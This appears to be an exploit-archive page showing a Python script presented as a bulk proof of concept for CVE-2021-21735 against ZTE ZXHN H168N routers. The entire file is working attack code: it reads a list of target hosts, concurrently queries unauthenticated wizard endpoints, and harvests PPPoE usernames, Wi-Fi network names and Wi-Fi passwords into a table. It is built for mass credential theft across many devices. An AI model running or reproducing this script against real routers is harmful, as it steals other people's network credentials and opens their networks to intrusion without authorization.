5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / zte_zxhn_h168n_bulk_poc.py PY
import argparse
import asyncio
import html
import re
from pathlib import Path

import aiohttp
from colorama import Fore, Style, init


# Host list that is read when -i/--input is not given on the command line.
DEFAULT_INPUT_PATH = Path("urls.txt")
# Form fields sent as the body of the POST request to the WLAN wizard endpoint.
PASSWORD_FORM = {
    "IF_ACTION": "GetPassword",
    "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK",
}
# Row layout shared by the header and every result row: six left-aligned,
# pipe-separated columns.
TABLE_TEMPLATE = "{:<3} | {:<34} | {:<30} | {:<30} | {:<30} | {:<25}"
# Column titles. Index 0 is the row counter; the remaining titles are the same
# strings used as keys of the per-host result dictionaries.
HEADERS = ["#", "URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password"]
# Regular expressions applied to the endpoint responses. Each one captures a
# single value in group 1.
AD_USERNAME_PATTERN = r"<ADUsername>(.*?)</ADUsername>"
VD_USERNAME_PATTERN = r"<VDUsername>(.*?)</VDUsername>"
ESSID_PATTERN = r"<ParaName>\s*ESSID\s*</ParaName>\s*<ParaValue>\s*(.*?)\s*</ParaValue>"
PASSWORD_PATTERN = r"<ParaName>KeyPassphrase</ParaName>\s*<ParaValue>(.*?)</ParaValue>"

# Initialise colorama at import time, before any coloured output is printed.
init()


def parse_args() -> argparse.Namespace:
    """Parse the command-line options of the script.

    Returns:
        A namespace with two attributes: ``input`` (a ``Path``, defaulting to
        ``DEFAULT_INPUT_PATH``) and ``timeout`` (an ``int``, defaulting to 10).
    """
    cli = argparse.ArgumentParser(
        description="Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints."
    )

    input_options = {
        "type": Path,
        "default": DEFAULT_INPUT_PATH,
        "help": "Path to a newline-delimited host list.",
    }
    cli.add_argument("-i", "--input", **input_options)

    timeout_options = {
        "type": int,
        "default": 10,
        "help": "Per-host request timeout in seconds.",
    }
    cli.add_argument("--timeout", **timeout_options)

    namespace = cli.parse_args()
    return namespace


def extract(pattern: str, text: str, default: str = "") -> str:
    """Return the first capture group of *pattern* found in *text*.

    The pattern is searched with ``re.DOTALL`` so ``.`` also matches newlines.
    The captured value is stripped of surrounding whitespace and HTML
    entities are decoded.

    Args:
        pattern: Regular expression containing at least one capture group.
        text: Text to search.
        default: Value returned when the pattern does not match.

    Returns:
        The cleaned-up capture, or *default* when there is no match.
    """
    found = re.compile(pattern, flags=re.DOTALL).search(text)
    if found is None:
        return default

    captured = found.group(1)
    trimmed = captured.strip()
    return html.unescape(trimmed)


def load_hosts(input_path: Path) -> list[str]:
    """Read the host list from *input_path*.

    The file is decoded as UTF-8 and split into lines. Each line is stripped
    of surrounding whitespace, and lines that are empty after stripping are
    dropped.

    Args:
        input_path: Path of the newline-delimited host file.

    Returns:
        The non-blank, stripped lines in file order.
    """
    contents = input_path.read_text(encoding="utf-8")
    stripped_lines = (entry.strip() for entry in contents.splitlines())
    return [entry for entry in stripped_lines if entry]


async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -> str:
    """Send one HTTP request and return the response body as text.

    Args:
        session: Client session used to issue the request.
        method: HTTP method name passed to ``session.request``.
        url: Request URL.
        **kwargs: Extra keyword arguments forwarded unchanged to
            ``session.request``.

    Returns:
        The decoded response body.

    Raises:
        Whatever ``response.raise_for_status()`` raises for an error status,
        plus any error raised while sending the request or reading the body.
    """
    pending_request = session.request(method, url, **kwargs)
    async with pending_request as reply:
        # Reject error statuses before the body is read.
        reply.raise_for_status()
        body = await reply.text()
    return body


async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -> dict[str, str]:
    """Query the wizard endpoints of *host* and collect the extracted fields.

    Three requests are issued one after another: a GET to the PPPoE wizard
    page, a GET to the WLAN wizard page, and a POST of ``PASSWORD_FORM`` to
    the WLAN wizard page. If any of them raises, the remaining requests are
    skipped and a row with empty values is returned instead of propagating
    the error.

    Args:
        session: Client session used for all three requests.
        host: Host (optionally with port) inserted into ``http://{host}/...``.

    Returns:
        A dictionary with the keys ``URL``, ``AD Username``, ``VD Username``,
        ``ESSID`` and ``Wi-Fi Password``. ``URL`` always holds *host*; the
        other values are empty strings when a request failed or a pattern did
        not match. The password value is cut to at most 64 characters.
    """
    wizard_root = f"http://{host}/wizard_page"
    pppoe_endpoint = f"{wizard_root}/wizard_pppoe_lua.lua"
    wlan_endpoint = f"{wizard_root}/wizard_wlan_config_lua.lua"

    # Start from the "nothing found" row; it is returned as-is on failure.
    record = {
        "URL": host,
        "AD Username": "",
        "VD Username": "",
        "ESSID": "",
        "Wi-Fi Password": "",
    }

    try:
        pppoe_body = await fetch_text(session, "GET", pppoe_endpoint)
        wlan_body = await fetch_text(session, "GET", wlan_endpoint)
        password_body = await fetch_text(session, "POST", wlan_endpoint, data=PASSWORD_FORM)
    except Exception:
        # Best effort: any failure yields the blank row for this host.
        return record

    record["AD Username"] = extract(AD_USERNAME_PATTERN, pppoe_body)
    record["VD Username"] = extract(VD_USERNAME_PATTERN, pppoe_body)
    record["ESSID"] = extract(ESSID_PATTERN, wlan_body)
    passphrase = extract(PASSWORD_PATTERN, password_body)
    record["Wi-Fi Password"] = passphrase[:64]
    return record


def print_header() -> None:
    """Print the coloured table header between two separator lines.

    Each title after the ``#`` column is prefixed with its own foreground
    colour, and the last one is followed by a style reset. The separator
    length is taken from the formatted header string, so it also counts the
    colour escape characters embedded in that string.
    """
    palette = (Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA)
    titles = [tint + title for tint, title in zip(palette, HEADERS[1:])]
    titles[-1] = titles[-1] + Style.RESET_ALL

    line = TABLE_TEMPLATE.format("#", *titles)
    rule = "".join((Fore.CYAN, "-" * len(line), Style.RESET_ALL))

    for output in (rule, line + "|", rule):
        print(output)


def print_row(index: int, row: dict[str, str]) -> None:
    """Print one coloured result row followed by a separator line.

    Args:
        index: Row number shown in the first column.
        row: Result dictionary with the keys ``URL``, ``AD Username``,
            ``VD Username``, ``ESSID`` and ``Wi-Fi Password``.

    The separator length is taken from the formatted row string, so it also
    counts the colour escape characters embedded in that string.
    """
    colored_columns = (
        (Fore.RED, "URL"),
        (Fore.GREEN, "AD Username"),
        (Fore.YELLOW, "VD Username"),
        (Fore.BLUE, "ESSID"),
        (Fore.MAGENTA, "Wi-Fi Password"),
    )
    cells = [tint + row[key] for tint, key in colored_columns]
    # Reset styling after the final column only.
    cells[-1] = cells[-1] + Style.RESET_ALL

    line = TABLE_TEMPLATE.format(str(index), *cells)
    rule = "".join((Fore.CYAN, "-" * len(line), Style.RESET_ALL))

    print(line + "|")
    print(rule)


async def run_bulk_poc(input_path: Path, timeout_seconds: int) -> None:
    """Process every host in *input_path* and print the results as a table.

    The host file is loaded first, then the header is printed. One task per
    host is created on a shared client session, and rows are printed in the
    order the tasks finish. A row whose five values were already printed is
    skipped.

    Args:
        input_path: Path of the newline-delimited host file.
        timeout_seconds: Value passed as ``total`` to the session's
            ``aiohttp.ClientTimeout``.
    """
    targets = load_hosts(input_path)
    already_printed = set()
    printed_count = 0
    identity_keys = ("URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password")

    print_header()

    client_timeout = aiohttp.ClientTimeout(total=timeout_seconds)
    async with aiohttp.ClientSession(timeout=client_timeout) as session:
        pending = []
        for target in targets:
            pending.append(asyncio.create_task(extract_router_secrets(session, target)))

        for finished in asyncio.as_completed(pending):
            try:
                row = await finished
            except Exception as error:
                print(f"{Fore.RED}Error: {error}{Style.RESET_ALL}")
                continue

            fingerprint = tuple(row[key] for key in identity_keys)
            if fingerprint not in already_printed:
                already_printed.add(fingerprint)
                printed_count += 1
                print_row(printed_count, row)


def main() -> None:
    """Script entry point: parse the options and run the asynchronous job."""
    options = parse_args()
    job = run_bulk_poc(options.input, options.timeout)
    asyncio.run(job)


# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()